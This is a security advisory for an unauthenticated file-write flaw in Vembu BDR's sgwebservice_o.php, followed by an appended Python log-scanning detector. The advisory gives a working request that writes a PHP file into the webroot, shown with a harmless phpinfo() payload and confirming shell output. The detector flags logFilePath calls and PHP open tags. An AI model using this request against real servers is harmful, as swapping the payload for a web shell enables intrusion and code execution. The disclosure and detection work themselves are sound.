Advisory

Upgrade to the latest version of Vembu: https://www.vembu.com/downloads

Technical details

Trigger the unauthenticated file upload by requesting the following URL: http://192.168.46.5:6060/sgwebservice_o.php?Action=logFilePath&path=./filewriteexploit.php&value=%3C%3Fphp%20phpinfo%28%29%20%3F%3E%0A

This will write a file called filewriteexploit.php, containing the decoded value <?php phpinfo() ?>, into the webroot of the Vembu webserver:

root@5a1a9ca3e0e9:/home/vembubdr/Vembu/VembuBDR/htmlgui# ls -lah filewriteexploit.php
-rw-r--r-- 1 www-data www-data 18 Jan 30 20:20 filewriteexploit.php
root@5a1a9ca3e0e9:/home/vembubdr/Vembu/VembuBDR/htmlgui#
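As an added example (not part of the advisory and not Vembu's code), a small Python script that reviews web-server access logs for calls to the logFilePath action of sgwebservice_o.php and raises the severity when the request carries the pattern shown above. The log lines are constructed, and the Apache/nginx combined log format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in combined format; not real Vembu data.
# The second line is the request from the advisory, the third a non-PHP path.
SAMPLE_LOG = """\
10.0.0.7 - - [30/Jan/2019:20:18:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [30/Jan/2019:20:20:03 +0000] "GET /sgwebservice_o.php?Action=logFilePath&path=./filewriteexploit.php&value=%3C%3Fphp%20phpinfo%28%29%20%3F%3E%0A HTTP/1.1" 200 0 "-" "curl/7.64.0"
10.0.0.7 - - [30/Jan/2019:20:22:45 +0000] "GET /sgwebservice_o.php?Action=logFilePath&path=/var/log/vembu/bdr.log&value=info HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# client, timestamp, method and request target from a combined-format line
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')
# PHP open tags (<?php, <?=, or bare <?) in the decoded value parameter
PHP_TAG_RE = re.compile(r"<\?(php|=)?", re.IGNORECASE)


def classify(line):
    """Return a finding for a logFilePath call, or None for any other request."""
    m = REQ_RE.match(line)
    if not m:
        return None
    client, ts, _method, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.endswith("/sgwebservice_o.php"):
        return None
    qs = parse_qs(parts.query)  # parse_qs also percent-decodes the values
    if qs.get("Action", [""])[0] != "logFilePath":
        return None
    path = qs.get("path", [""])[0]
    value = qs.get("value", [""])[0]
    reasons = []
    if path.strip().lower().endswith(".php"):
        reasons.append("path parameter names a .php file")
    if PHP_TAG_RE.search(value):
        reasons.append("value parameter contains a PHP open tag")
    # Every logFilePath call is reported (the action needs no authentication);
    # calls that would write PHP code into the webroot are rated high.
    return {"client": client, "time": ts, "path": path,
            "severity": "high" if reasons else "info", "reasons": reasons}


def scan(log_text):
    """Return findings for all logFilePath calls in the log, in file order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"].upper(), f["client"], f["path"], "; ".join(f["reasons"]))
```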